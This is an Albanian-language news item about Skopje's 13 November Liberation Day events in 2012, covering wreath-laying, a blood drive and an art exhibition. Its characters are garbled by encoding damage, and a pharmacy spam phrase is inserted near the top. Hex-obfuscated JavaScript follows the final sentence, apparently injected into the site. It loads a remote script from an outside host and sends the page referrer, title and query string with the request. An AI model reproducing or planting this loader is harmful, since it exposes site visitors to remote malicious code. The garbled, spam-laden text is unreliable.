koce_941351600

Shkupi e shA�non DitA�n e A�lirimit

canada pharmacies free shipping. Me disa manifestime kulturore, humanitare dhe sportive, sot do tA� shA�nohet 13 NA�ntori – Dita e A�lirimit tA� Shkupit.

Kryetari i Kuvendit tA� RepublikA�s sA� MaqedonisA�, Trajko Veljanoski do ta kryesojA� delegacionin kuvendorm i cili me rastin e DitA�s sA� A�lirimit tA� Qytetit tA� Shkupit do tA� vendos lule para pA�rmendores sA� A�lirimtarA�ve tA� Qytetit tA� Shkupit.

NjA� delegacion i Qytetit tA� Shkupit i kryesuar nga kryetari Koce Trajanovski do tA� vendos lule para PA�rmendores sA� A�lirimtarA�ve tA� Qytetit tA� Shkupit nA� Varrezat e partizanA�ve “Butel” dhe para pA�rmendores gjeneral Mihajllo Apostollski.

NA� ShtA�pinA� e ARM-sA� prej ora 9 deri nA� ora 17 do tA� organizohet aksion tardicional pA�r dhurimin e gjakut tA� Kryqit tA� kuq tA� Qytetit tA� Shkupit. Delegacione tA� larta shtetA�rore, luftA�tarA� tA� LNA�, pA�rfaqA�sues tA� ArmatA�s sA� RepublikA�s sA� MaqedonisA�, pA�rfaqA�sues tA� komunave tA� Qytetit tA� Shkupit, anA�tarA� tA� institucioneve tA� tjera, si dhe tA� delegacionit zyrtar tA� Qytetit tA� Shkupit do tA� vendosin lule para PA�rmendores sA� A�lirimtarA�ve tA� Shkupit.

Do tA� mbahet hapja e ekspozitA�s sA� veprave artistike tA� KolonisA� ndA�rkombA�tare tA� artit “Shkupi 2012”, me A�’rast kryetari i Qytetit tA� Shkupit Trajanovski fituesve do t’ua dorA�zojA� A�mimin “13 NA�ntori” tA� Qytetit tA� Shkupit pA�r vitin 2012.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}